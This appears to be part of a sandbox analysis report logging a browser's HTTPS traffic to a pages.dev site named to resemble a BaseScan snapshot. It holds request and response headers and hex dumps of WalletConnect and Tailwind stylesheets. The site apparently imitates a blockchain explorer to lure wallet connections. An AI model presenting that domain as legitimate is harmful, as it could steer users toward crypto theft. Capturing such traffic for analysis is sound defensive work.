                                                                                                                                                                                                                                              2024-09-28 01:15:54 UTC1369INData Raw: 20 30 2c 20 30 2c 20 30 29 3b 0d 0a 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 3a 20 72 67 62 61 28 33 37 2c 20 34 31 2c 20 34 36 2c 20 30 2e 39 35 29 3b 0d 0a 20 20 20 20 20 68 65 69 67 68 74 3a 20 31 30 30 25 3b 0d 0a 20 20 20 20 20 6c 65 66 74 3a 20 30 3b 0d 0a 20 20 20 20 20 70 6f 69 6e 74 65 72 2d 65 76 65 6e 74 73 3a 20 61 75 74 6f 3b 0d 0a 20 20 20 20 20 70 6f 73 69 74 69 6f 6e 3a 20 66 69 78 65 64 3b 0d 0a 20 20 20 20 20 74 6f 70 3a 20 30 3b 0d 0a 20 20 20 20 20 74 72 61 6e 73 69 74 69 6f 6e 3a 20 30 2e 34 73 20 63 75 62 69 63 2d 62 65 7a 69 65 72 28 30 2e 31 39 2c 20 31 2c 20 30 2e 32 32 2c 20 31 29 3b 0d 0a 20 20 20 20 20 77 69 64 74 68 3a 20 31 30 30 25 3b 0d 0a 20 20 20 20 20 77 69 6c 6c 2d 63 68 61 6e 67 65 3a 20 6f 70 61 63 69 74 79 3b 0d
                                                                                                                                                                                                                                              Data Ascii: 0, 0, 0); background: rgba(37, 41, 46, 0.95); height: 100%; left: 0; pointer-events: auto; position: fixed; top: 0; transition: 0.4s cubic-bezier(0.19, 1, 0.22, 1); width: 100%; will-change: opacity;
                                                                                                                                                                                                                                              2024-09-28 01:15:54 UTC1369INData Raw: 61 63 69 74 79 3a 20 31 3b 0d 0a 20 7d 0d 0a 0d 0a 20 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 20 37 36 38 70 78 29 20 7b 0d 0a 20 20 20 20 20 2e 77 61 6c 6c 65 74 63 6f 6e 6e 65 63 74 2d 6d 6f 64 61 6c 5f 5f 68 65 61 64 65 72 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 68 65 69 67 68 74 3a 20 31 33 30 70 78 3b 0d 0a 20 20 20 20 20 7d 0d 0a 20 20 20 20 20 2e 77 61 6c 6c 65 74 63 6f 6e 6e 65 63 74 2d 6d 6f 64 61 6c 5f 5f 62 61 73 65 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 6f 76 65 72 66 6c 6f 77 3a 20 61 75 74 6f 3b 0d 0a 20 20 20 20 20 7d 0d 0a 20 7d 0d 0a 0d 0a 20 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 64 65 76 69 63 65 2d 77 69 64 74 68 3a 20 34 31 35 70
                                                                                                                                                                                                                                              Data Ascii: acity: 1; } @media only screen and (max-width: 768px) { .walletconnect-modal__header { height: 130px; } .walletconnect-modal__base { overflow: auto; } } @media only screen and (min-device-width: 415p
                                                                                                                                                                                                                                              2024-09-28 01:15:54 UTC1369INData Raw: 20 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 0d 0a 20 20 20 20 20 74 72 61 6e 73 69 74 69 6f 6e 3a 20 30 2e 34 73 20 63 75 62 69 63 2d 62 65 7a 69 65 72 28 30 2e 31 39 2c 20 31 2c 20 30 2e 32 32 2c 20 31 29 3b 0d 0a 20 20 20 20 20 77 69 6c 6c 2d 63 68 61 6e 67 65 3a 20 74 72 61 6e 73 66 6f 72 6d 3b 0d 0a 20 20 20 20 20 6f 76 65 72 66 6c 6f 77 3a 20 76 69 73 69 62 6c 65 3b 0d 0a 20 20 20 20 20 74 72 61 6e 73 66 6f 72 6d 3a 20 74 72 61 6e 73 6c 61 74 65 59 28 2d 35 30 25 29 3b 0d 0a 20 20 20 20 20 74 6f 70 3a 20 35 30 25 3b 0d 0a 20 20 20 20 20 6d 61 78 2d 77 69 64 74 68 3a 20 35 30 30 70 78 3b 0d 0a 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 61 75 74 6f 3b 0d 0a 20 7d 0d 0a 0d 0a 20 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20
                                                                                                                                                                                                                                              Data Ascii: text-align: center; transition: 0.4s cubic-bezier(0.19, 1, 0.22, 1); will-change: transform; overflow: visible; transform: translateY(-50%); top: 50%; max-width: 500px; margin: auto; } @media only screen
                                                                                                                                                                                                                                              2024-09-28 01:15:54 UTC1369INData Raw: 0d 0a 20 20 20 20 20 6c 65 74 74 65 72 2d 73 70 61 63 69 6e 67 3a 20 30 3b 0d 0a 20 20 20 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 31 2e 31 38 37 35 65 6d 3b 0d 0a 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 20 30 20 31 39 70 78 20 30 3b 0d 0a 20 20 20 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 0d 0a 20 20 20 20 20 77 69 64 74 68 3a 20 31 30 30 25 3b 0d 0a 20 7d 0d 0a 0d 0a 20 2e 77 61 6c 6c 65 74 63 6f 6e 6e 65 63 74 2d 6d 6f 64 61 6c 5f 5f 62 61 73 65 5f 5f 72 6f 77 20 7b 0d 0a 20 20 20 20 20 2d 77 65 62 6b 69 74 2d 74 61 70 2d 68 69 67 68 6c 69 67 68 74 2d 63 6f 6c 6f 72 3a 20 72 67 62 61 28 30 2c 20 30 2c 20 30 2c 20 30 29 3b 0d 0a 20 20 20 20 20 61 6c 69 67 6e 2d 69 74 65 6d 73 3a 20 63 65 6e 74 65 72 3b 0d 0a 20 20 20 20 20 62
                                                                                                                                                                                                                                              Data Ascii: letter-spacing: 0; line-height: 1.1875em; margin: 0 0 19px 0; text-align: center; width: 100%; } .walletconnect-modal__base__row { -webkit-tap-highlight-color: rgba(0, 0, 0, 0); align-items: center; b
                                                                                                                                                                                                                                              2024-09-28 01:15:54 UTC1369INData Raw: 20 72 67 62 61 28 33 37 2c 20 34 31 2c 20 34 36 2c 20 30 2e 32 35 29 3b 0d 0a 20 7d 0d 0a 0d 0a 20 2e 77 61 6c 6c 65 74 63 6f 6e 6e 65 63 74 2d 6d 6f 64 61 6c 5f 5f 62 61 73 65 5f 5f 72 6f 77 5f 5f 72 69 67 68 74 5f 5f 63 61 72 65 74 20 7b 0d 0a 20 20 20 20 20 68 65 69 67 68 74 3a 20 31 38 70 78 3b 0d 0a 20 20 20 20 20 6f 70 61 63 69 74 79 3a 20 30 2e 33 3b 0d 0a 20 20 20 20 20 74 72 61 6e 73 69 74 69 6f 6e 3a 20 30 2e 31 73 20 63 75 62 69 63 2d 62 65 7a 69 65 72 28 30 2e 32 35 2c 20 30 2e 34 36 2c 20 30 2e 34 35 2c 20 30 2e 39 34 29 3b 0d 0a 20 20 20 20 20 77 69 64 74 68 3a 20 38 70 78 3b 0d 0a 20 20 20 20 20 77 69 6c 6c 2d 63 68 61 6e 67 65 3a 20 6f 70 61 63 69 74 79 3b 0d 0a 20 7d 0d 0a 0d 0a 20 2e 77 61 6c 6c 65 74 63 6f 6e 6e 65 63 74 2d 6d 6f 64 61
                                                                                                                                                                                                                                              Data Ascii: rgba(37, 41, 46, 0.25); } .walletconnect-modal__base__row__right__caret { height: 18px; opacity: 0.3; transition: 0.1s cubic-bezier(0.25, 0.46, 0.45, 0.94); width: 8px; will-change: opacity; } .walletconnect-moda
                                                                                                                                                                                                                                              2024-09-28 01:15:54 UTC1369INData Raw: 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 20 37 36 38 70 78 29 20 7b 0d 0a 20 20 20 20 20 2e 77 61 6c 6c 65 74 63 6f 6e 6e 65 63 74 2d 6d 6f 64 61 6c 5f 5f 66 6f 6f 74 65 72 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 2d 74 6f 70 3a 20 35 76 77 3b 0d 0a 20 20 20 20 20 7d 0d 0a 20 7d 0d 0a 0d 0a 20 2e 77 61 6c 6c 65 74 63 6f 6e 6e 65 63 74 2d 6d 6f 64 61 6c 5f 5f 66 6f 6f 74 65 72 20 61 20 7b 0d 0a 20 20 20 20 20 63 75 72 73 6f 72 3a 20 70 6f 69 6e 74 65 72 3b 0d 0a 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 38 39 38 64 39 37 3b 0d 0a 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 35 70 78 3b 0d 0a 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 20 61 75 74 6f 3b 0d 0a 20 7d 0d 0a 0d 0a 20 40 6d 65 64 69 61 20
                                                                                                                                                                                                                                              Data Ascii: only screen and (max-width: 768px) { .walletconnect-modal__footer { margin-top: 5vw; } } .walletconnect-modal__footer a { cursor: pointer; color: #898d97; font-size: 15px; margin: 0 auto; } @media
                                                                                                                                                                                                                                              2024-09-28 01:15:54 UTC1369INData Raw: 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 20 33 32 30 70 78 29 20 7b 0d 0a 20 20 20 20 20 2e 77 61 6c 6c 65 74 63 6f 6e 6e 65 63 74 2d 63 6f 6e 6e 65 63 74 5f 5f 62 75 74 74 6f 6e 5f 5f 69 63 6f 6e 5f 61 6e 63 68 6f 72 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 34 70 78 3b 0d 0a 20 20 20 20 20 7d 0d 0a 20 7d 0d 0a 0d 0a 20 2e 77 61 6c 6c 65 74 63 6f 6e 6e 65 63 74 2d 63 6f 6e 6e 65 63 74 5f 5f 62 75 74 74 6f 6e 5f 5f 69 63 6f 6e 20 7b 0d 0a 20 20 20 20 20 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 20 31 30 70 78 3b 0d 0a 20 20 20 20 20 68 65 69 67 68 74 3a 20 34 32 70 78 3b 0d 0a 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0d 0a 20 20 20 20 20 77 69 64 74 68 3a 20 34 32 70 78 3b 0d 0a 20 20 20 20 20 62
                                                                                                                                                                                                                                              Data Ascii: ly screen and (max-width: 320px) { .walletconnect-connect__button__icon_anchor { margin: 4px; } } .walletconnect-connect__button__icon { border-radius: 10px; height: 42px; margin: 0; width: 42px; b
                                                                                                                                                                                                                                              2024-09-28 01:15:54 UTC1369INData Raw: 74 3a 20 31 65 6d 3b 0d 0a 20 20 20 20 20 6f 75 74 6c 69 6e 65 3a 20 30 70 78 3b 0d 0a 20 7d 0d 0a 0d 0a 20 2a 20 7b 0d 0a 20 20 20 20 20 62 6f 78 2d 73 69 7a 69 6e 67 3a 20 62 6f 72 64 65 72 2d 62 6f 78 20 21 69 6d 70 6f 72 74 61 6e 74 3b 0d 0a 20 7d 0d 0a 0d 0a 20 62 75 74 74 6f 6e 20 7b 0d 0a 20 20 20 20 20 74 72 61 6e 73 69 74 69 6f 6e 3a 20 61 6c 6c 20 30 2e 31 35 73 20 65 61 73 65 2d 69 6e 2d 6f 75 74 20 30 73 3b 0d 0a 20 20 20 20 20 70 6f 73 69 74 69 6f 6e 3a 20 72 65 6c 61 74 69 76 65 3b 0d 0a 20 20 20 20 20 62 6f 78 2d 73 69 7a 69 6e 67 3a 20 62 6f 72 64 65 72 2d 62 6f 78 3b 0d 0a 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 34 30 39 39 66 66 3b 0d 0a 20 20 20 20 20 62 6f 72 64 65 72 3a 20 6e 6f 6e 65 3b 0d 0a 20 20 20
                                                                                                                                                                                                                                              Data Ascii: t: 1em; outline: 0px; } * { box-sizing: border-box !important; } button { transition: all 0.15s ease-in-out 0s; position: relative; box-sizing: border-box; background-color: #4099ff; border: none;


                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                              3192.168.2.549717172.66.47.854435896C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                              2024-09-28 01:15:54 UTC653OUTGET /840013fd8c2ab234.css HTTP/1.1
                                                                                                                                                                                                                                              Host: basescan-snapshot0x28a5e71bfc02723eac17e39c84c5190415c0d9.pages.dev
                                                                                                                                                                                                                                              Connection: keep-alive
                                                                                                                                                                                                                                              sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                              sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                              sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                              Accept: text/css,*/*;q=0.1
                                                                                                                                                                                                                                              Sec-Fetch-Site: same-origin
                                                                                                                                                                                                                                              Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                              Sec-Fetch-Dest: style
                                                                                                                                                                                                                                              Referer: https://basescan-snapshot0x28a5e71bfc02723eac17e39c84c5190415c0d9.pages.dev/
                                                                                                                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                              2024-09-28 01:15:54 UTC788INHTTP/1.1 200 OK
                                                                                                                                                                                                                                              Date: Sat, 28 Sep 2024 01:15:54 GMT
                                                                                                                                                                                                                                              Content-Type: text/css; charset=utf-8
                                                                                                                                                                                                                                              Content-Length: 17953
                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                              Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                              Cache-Control: public, max-age=0, must-revalidate
                                                                                                                                                                                                                                              ETag: "28b1be42ac32f49cf5f368f87ae14f21"
                                                                                                                                                                                                                                              referrer-policy: strict-origin-when-cross-origin
                                                                                                                                                                                                                                              x-content-type-options: nosniff
                                                                                                                                                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=MluN3cKreqak279xGu%2BnmPLMqMCsAn3g7bvfUivriZRFukor1ZAypHrZ8ZS5uGJUu56gdA%2BXH8zQKz4b9M8ztndcY9AFfXUGpQzAL1Sh0LpiaMDd1hBNDrZoYj3RhUpcNhGAM1KfPvcITptZC9I7nW9%2FjeTKA5WU7zFukz7x8ffjDXVSFbdva39waIsDbOy2iB%2FpYdXe"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                              Server: cloudflare
                                                                                                                                                                                                                                              CF-RAY: 8c9fe29139a97cfa-EWR
                                                                                                                                                                                                                                              2024-09-28 01:15:54 UTC581INData Raw: 2f 2a 0a 21 20 74 61 69 6c 77 69 6e 64 63 73 73 20 76 33 2e 32 2e 37 20 7c 20 4d 49 54 20 4c 69 63 65 6e 73 65 20 7c 20 68 74 74 70 73 3a 2f 2f 74 61 69 6c 77 69 6e 64 63 73 73 2e 63 6f 6d 0a 2a 2f 0a 2a 2c 0a 3a 61 66 74 65 72 2c 0a 3a 62 65 66 6f 72 65 20 7b 0a 20 20 62 6f 78 2d 73 69 7a 69 6e 67 3a 20 62 6f 72 64 65 72 2d 62 6f 78 3b 0a 20 20 62 6f 72 64 65 72 3a 20 30 20 73 6f 6c 69 64 20 23 65 65 65 3b 0a 7d 0a 3a 61 66 74 65 72 2c 0a 3a 62 65 66 6f 72 65 20 7b 0a 20 20 2d 2d 74 77 2d 63 6f 6e 74 65 6e 74 3a 20 22 22 3b 0a 7d 0a 68 74 6d 6c 20 7b 0a 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 31 2e 35 3b 0a 20 20 2d 77 65 62 6b 69 74 2d 74 65 78 74 2d 73 69 7a 65 2d 61 64 6a 75 73 74 3a 20 31 30 30 25 3b 0a 20 20 2d 6d 6f 7a 2d 74 61 62 2d 73 69 7a
                                                                                                                                                                                                                                              Data Ascii: /*! tailwindcss v3.2.7 | MIT License | https://tailwindcss.com*/*,:after,:before { box-sizing: border-box; border: 0 solid #eee;}:after,:before { --tw-content: "";}html { line-height: 1.5; -webkit-text-size-adjust: 100%; -moz-tab-siz
                                                                                                                                                                                                                                              2024-09-28 01:15:54 UTC1369INData Raw: 3b 0a 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 69 6e 68 65 72 69 74 3b 0a 7d 0a 68 72 20 7b 0a 20 20 68 65 69 67 68 74 3a 20 30 3b 0a 20 20 63 6f 6c 6f 72 3a 20 69 6e 68 65 72 69 74 3b 0a 20 20 62 6f 72 64 65 72 2d 74 6f 70 2d 77 69 64 74 68 3a 20 31 70 78 3b 0a 7d 0a 61 62 62 72 3a 77 68 65 72 65 28 5b 74 69 74 6c 65 5d 29 20 7b 0a 20 20 2d 77 65 62 6b 69 74 2d 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 20 75 6e 64 65 72 6c 69 6e 65 20 64 6f 74 74 65 64 3b 0a 20 20 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 20 75 6e 64 65 72 6c 69 6e 65 20 64 6f 74 74 65 64 3b 0a 7d 0a 68 31 2c 0a 68 32 2c 0a 68 33 2c 0a 68 34 2c 0a 68 35 2c 0a 68 36 20 7b 0a 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 69 6e 68 65 72 69 74 3b 0a 20 20 66 6f 6e 74 2d 77 65 69 67
                                                                                                                                                                                                                                              Data Ascii: ; line-height: inherit;}hr { height: 0; color: inherit; border-top-width: 1px;}abbr:where([title]) { -webkit-text-decoration: underline dotted; text-decoration: underline dotted;}h1,h2,h3,h4,h5,h6 { font-size: inherit; font-weig
                                                                                                                                                                                                                                              2024-09-28 01:15:54 UTC1369INData Raw: 7d 0a 3a 3a 2d 77 65 62 6b 69 74 2d 73 65 61 72 63 68 2d 64 65 63 6f 72 61 74 69 6f 6e 20 7b 0a 20 20 2d 77 65 62 6b 69 74 2d 61 70 70 65 61 72 61 6e 63 65 3a 20 6e 6f 6e 65 3b 0a 7d 0a 3a 3a 2d 77 65 62 6b 69 74 2d 66 69 6c 65 2d 75 70 6c 6f 61 64 2d 62 75 74 74 6f 6e 20 7b 0a 20 20 2d 77 65 62 6b 69 74 2d 61 70 70 65 61 72 61 6e 63 65 3a 20 62 75 74 74 6f 6e 3b 0a 20 20 66 6f 6e 74 3a 20 69 6e 68 65 72 69 74 3b 0a 7d 0a 73 75 6d 6d 61 72 79 20 7b 0a 20 20 64 69 73 70 6c 61 79 3a 20 6c 69 73 74 2d 69 74 65 6d 3b 0a 7d 0a 62 6c 6f 63 6b 71 75 6f 74 65 2c 0a 64 64 2c 0a 64 6c 2c 0a 66 69 67 75 72 65 2c 0a 68 31 2c 0a 68 32 2c 0a 68 33 2c 0a 68 34 2c 0a 68 35 2c 0a 68 36 2c 0a 68 72 2c 0a 70 2c 0a 70 72 65 20 7b 0a 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 7d
                                                                                                                                                                                                                                              Data Ascii: }::-webkit-search-decoration { -webkit-appearance: none;}::-webkit-file-upload-button { -webkit-appearance: button; font: inherit;}summary { display: list-item;}blockquote,dd,dl,figure,h1,h2,h3,h4,h5,h6,hr,p,pre { margin: 0;}
                                                                                                                                                                                                                                              2024-09-28 01:15:54 UTC1369INData Raw: 6c 6f 72 3a 20 72 67 62 61 28 33 33 2c 20 31 35 30 2c 20 32 34 33 2c 20 30 2e 35 29 3b 0a 20 20 2d 2d 74 77 2d 72 69 6e 67 2d 6f 66 66 73 65 74 2d 73 68 61 64 6f 77 3a 20 30 20 30 20 23 30 30 30 30 3b 0a 20 20 2d 2d 74 77 2d 72 69 6e 67 2d 73 68 61 64 6f 77 3a 20 30 20 30 20 23 30 30 30 30 3b 0a 20 20 2d 2d 74 77 2d 73 68 61 64 6f 77 3a 20 30 20 30 20 23 30 30 30 30 3b 0a 20 20 2d 2d 74 77 2d 73 68 61 64 6f 77 2d 63 6f 6c 6f 72 65 64 3a 20 30 20 30 20 23 30 30 30 30 3b 0a 20 20 2d 2d 74 77 2d 62 6c 75 72 3a 20 3b 0a 20 20 2d 2d 74 77 2d 62 72 69 67 68 74 6e 65 73 73 3a 20 3b 0a 20 20 2d 2d 74 77 2d 63 6f 6e 74 72 61 73 74 3a 20 3b 0a 20 20 2d 2d 74 77 2d 67 72 61 79 73 63 61 6c 65 3a 20 3b 0a 20 20 2d 2d 74 77 2d 68 75 65 2d 72 6f 74 61 74 65 3a 20 3b 0a
                                                                                                                                                                                                                                              Data Ascii: lor: rgba(33, 150, 243, 0.5); --tw-ring-offset-shadow: 0 0 #0000; --tw-ring-shadow: 0 0 #0000; --tw-shadow: 0 0 #0000; --tw-shadow-colored: 0 0 #0000; --tw-blur: ; --tw-brightness: ; --tw-contrast: ; --tw-grayscale: ; --tw-hue-rotate: ;
                                                                                                                                                                                                                                              2024-09-28 01:15:54 UTC1369INData Raw: 20 20 2d 2d 74 77 2d 73 61 74 75 72 61 74 65 3a 20 3b 0a 20 20 2d 2d 74 77 2d 73 65 70 69 61 3a 20 3b 0a 20 20 2d 2d 74 77 2d 64 72 6f 70 2d 73 68 61 64 6f 77 3a 20 3b 0a 20 20 2d 2d 74 77 2d 62 61 63 6b 64 72 6f 70 2d 62 6c 75 72 3a 20 3b 0a 20 20 2d 2d 74 77 2d 62 61 63 6b 64 72 6f 70 2d 62 72 69 67 68 74 6e 65 73 73 3a 20 3b 0a 20 20 2d 2d 74 77 2d 62 61 63 6b 64 72 6f 70 2d 63 6f 6e 74 72 61 73 74 3a 20 3b 0a 20 20 2d 2d 74 77 2d 62 61 63 6b 64 72 6f 70 2d 67 72 61 79 73 63 61 6c 65 3a 20 3b 0a 20 20 2d 2d 74 77 2d 62 61 63 6b 64 72 6f 70 2d 68 75 65 2d 72 6f 74 61 74 65 3a 20 3b 0a 20 20 2d 2d 74 77 2d 62 61 63 6b 64 72 6f 70 2d 69 6e 76 65 72 74 3a 20 3b 0a 20 20 2d 2d 74 77 2d 62 61 63 6b 64 72 6f 70 2d 6f 70 61 63 69 74 79 3a 20 3b 0a 20 20 2d 2d
                                                                                                                                                                                                                                              Data Ascii: --tw-saturate: ; --tw-sepia: ; --tw-drop-shadow: ; --tw-backdrop-blur: ; --tw-backdrop-brightness: ; --tw-backdrop-contrast: ; --tw-backdrop-grayscale: ; --tw-backdrop-hue-rotate: ; --tw-backdrop-invert: ; --tw-backdrop-opacity: ; --
                                                                                                                                                                                                                                              2024-09-28 01:15:54 UTC1369INData Raw: 20 20 64 69 73 70 6c 61 79 3a 20 69 6e 6c 69 6e 65 2d 62 6c 6f 63 6b 3b 0a 7d 0a 2e 66 6c 65 78 20 7b 0a 20 20 64 69 73 70 6c 61 79 3a 20 66 6c 65 78 3b 0a 7d 0a 2e 69 6e 6c 69 6e 65 2d 66 6c 65 78 20 7b 0a 20 20 64 69 73 70 6c 61 79 3a 20 69 6e 6c 69 6e 65 2d 66 6c 65 78 3b 0a 7d 0a 2e 67 72 69 64 20 7b 0a 20 20 64 69 73 70 6c 61 79 3a 20 67 72 69 64 3b 0a 7d 0a 2e 68 69 64 64 65 6e 20 7b 0a 20 20 64 69 73 70 6c 61 79 3a 20 6e 6f 6e 65 3b 0a 7d 0a 2e 68 2d 31 30 20 7b 0a 20 20 68 65 69 67 68 74 3a 20 32 2e 35 72 65 6d 3b 0a 7d 0a 2e 68 2d 31 32 20 7b 0a 20 20 68 65 69 67 68 74 3a 20 33 72 65 6d 3b 0a 7d 0a 2e 68 2d 32 30 20 7b 0a 20 20 68 65 69 67 68 74 3a 20 35 72 65 6d 3b 0a 7d 0a 2e 68 2d 33 20 7b 0a 20 20 68 65 69 67 68 74 3a 20 30 2e 37 35 72 65 6d
                                                                                                                                                                                                                                              Data Ascii: display: inline-block;}.flex { display: flex;}.inline-flex { display: inline-flex;}.grid { display: grid;}.hidden { display: none;}.h-10 { height: 2.5rem;}.h-12 { height: 3rem;}.h-20 { height: 5rem;}.h-3 { height: 0.75rem
                                                                                                                                                                                                                                              2024-09-28 01:15:54 UTC1369INData Raw: 63 65 6e 74 65 72 3b 0a 7d 0a 2e 6a 75 73 74 69 66 79 2d 62 65 74 77 65 65 6e 20 7b 0a 20 20 6a 75 73 74 69 66 79 2d 63 6f 6e 74 65 6e 74 3a 20 73 70 61 63 65 2d 62 65 74 77 65 65 6e 3b 0a 7d 0a 2e 67 61 70 2d 30 20 7b 0a 20 20 67 61 70 3a 20 30 3b 0a 7d 0a 2e 67 61 70 2d 30 5c 2e 35 20 7b 0a 20 20 67 61 70 3a 20 30 2e 31 32 35 72 65 6d 3b 0a 7d 0a 2e 67 61 70 2d 31 20 7b 0a 20 20 67 61 70 3a 20 30 2e 32 35 72 65 6d 3b 0a 7d 0a 2e 67 61 70 2d 31 30 20 7b 0a 20 20 67 61 70 3a 20 32 2e 35 72 65 6d 3b 0a 7d 0a 2e 67 61 70 2d 32 20 7b 0a 20 20 67 61 70 3a 20 30 2e 35 72 65 6d 3b 0a 7d 0a 2e 67 61 70 2d 33 20 7b 0a 20 20 67 61 70 3a 20 30 2e 37 35 72 65 6d 3b 0a 7d 0a 2e 67 61 70 2d 34 20 7b 0a 20 20 67 61 70 3a 20 31 72 65 6d 3b 0a 7d 0a 2e 67 61 70 2d 35 20
                                                                                                                                                                                                                                              Data Ascii: center;}.justify-between { justify-content: space-between;}.gap-0 { gap: 0;}.gap-0\.5 { gap: 0.125rem;}.gap-1 { gap: 0.25rem;}.gap-10 { gap: 2.5rem;}.gap-2 { gap: 0.5rem;}.gap-3 { gap: 0.75rem;}.gap-4 { gap: 1rem;}.gap-5
                                                                                                                                                                                                                                              2024-09-28 01:15:54 UTC1369INData Raw: 6f 72 64 65 72 2d 74 20 7b 0a 20 20 62 6f 72 64 65 72 2d 74 6f 70 2d 77 69 64 74 68 3a 20 31 70 78 3b 0a 7d 0a 2e 62 67 2d 62 6c 61 63 6b 20 7b 0a 20 20 2d 2d 74 77 2d 62 67 2d 6f 70 61 63 69 74 79 3a 20 31 3b 0a 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 72 67 62 28 30 20 30 20 30 20 2f 20 76 61 72 28 2d 2d 74 77 2d 62 67 2d 6f 70 61 63 69 74 79 29 29 3b 0a 7d 0a 2e 62 67 2d 67 72 61 79 2d 31 30 30 20 7b 0a 20 20 2d 2d 74 77 2d 62 67 2d 6f 70 61 63 69 74 79 3a 20 31 3b 0a 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 72 67 62 28 32 34 35 20 32 34 35 20 32 34 35 20 2f 20 76 61 72 28 2d 2d 74 77 2d 62 67 2d 6f 70 61 63 69 74 79 29 29 3b 0a 7d 0a 2e 62 67 2d 67 72 61 79 2d 32 30 30 20 7b 0a 20 20 2d 2d 74 77 2d 62 67 2d 6f 70
                                                                                                                                                                                                                                              Data Ascii: order-t { border-top-width: 1px;}.bg-black { --tw-bg-opacity: 1; background-color: rgb(0 0 0 / var(--tw-bg-opacity));}.bg-gray-100 { --tw-bg-opacity: 1; background-color: rgb(245 245 245 / var(--tw-bg-opacity));}.bg-gray-200 { --tw-bg-op
                                                                                                                                                                                                                                              2024-09-28 01:15:54 UTC1369INData Raw: 69 65 6e 74 2d 74 6f 3a 20 23 66 66 30 3b 0a 7d 0a 2e 6f 62 6a 65 63 74 2d 63 6f 76 65 72 20 7b 0a 20 20 2d 6f 2d 6f 62 6a 65 63 74 2d 66 69 74 3a 20 63 6f 76 65 72 3b 0a 20 20 6f 62 6a 65 63 74 2d 66 69 74 3a 20 63 6f 76 65 72 3b 0a 7d 0a 2e 70 2d 31 20 7b 0a 20 20 70 61 64 64 69 6e 67 3a 20 30 2e 32 35 72 65 6d 3b 0a 7d 0a 2e 70 2d 32 20 7b 0a 20 20 70 61 64 64 69 6e 67 3a 20 30 2e 35 72 65 6d 3b 0a 7d 0a 2e 70 2d 34 20 7b 0a 20 20 70 61 64 64 69 6e 67 3a 20 31 72 65 6d 3b 0a 7d 0a 2e 70 2d 35 20 7b 0a 20 20 70 61 64 64 69 6e 67 3a 20 31 2e 32 35 72 65 6d 3b 0a 7d 0a 2e 70 2d 36 20 7b 0a 20 20 70 61 64 64 69 6e 67 3a 20 31 2e 35 72 65 6d 3b 0a 7d 0a 2e 70 78 2d 31 30 20 7b 0a 20 20 70 61 64 64 69 6e 67 2d 6c 65 66 74 3a 20 32 2e 35 72 65 6d 3b 0a 20 20
                                                                                                                                                                                                                                              Data Ascii: ient-to: #ff0;}.object-cover { -o-object-fit: cover; object-fit: cover;}.p-1 { padding: 0.25rem;}.p-2 { padding: 0.5rem;}.p-4 { padding: 1rem;}.p-5 { padding: 1.25rem;}.p-6 { padding: 1.5rem;}.px-10 { padding-left: 2.5rem;
